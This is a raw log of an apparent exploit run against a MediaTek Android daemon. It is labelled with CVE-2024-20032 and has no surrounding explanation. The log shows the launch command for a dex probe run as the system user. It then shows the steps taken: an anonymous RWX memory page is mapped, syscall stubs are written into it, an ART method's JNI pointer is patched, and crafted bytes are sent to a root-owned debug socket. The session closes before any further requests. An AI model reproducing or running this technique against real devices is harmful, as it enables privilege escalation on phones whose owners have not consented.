command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=11 --class=4 --payload --no-dump-check
probe=aee-session
dex_md5=a41ffab5cc2d2ad03e146e48b9f5bc3c
dex_sha256=d1572f8085f0f2807f4eee18241f2f08dc9ff1c4f5556d006fa9023a1fe5da70
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
a41ffab5cc2d2ad03e146e48b9f5bc3c  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=29787 target_pid=29787 class=4 ind=11 flags=0x0 payload=true
[+] Scratch buffer at 0x7689b81000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x7689b80000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x768452fc88
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x73d341a2c0
    entry_point    = 0x10380008771bc578
[*] Patching data_ (JNI) → 0x7689b80000
    data_       = 0x7689b80000 ✓
    entry_point = 0x10380008771bc578 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=11 class=4 pid=29787 flags=0x0 payload=14
[session] IND bytes: 02 00 00 00 0b 00 00 00 5b 74 00 00 04 00 00 00 0e 00 00 00 00 00 00 00
[session] JE 2nd-IND payload=139
[session] REQ#0 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] no REQs on @com.mtk.aee.aed_64 (daemon may need crash state)

[phase-check] skipped (--no-dump-check)
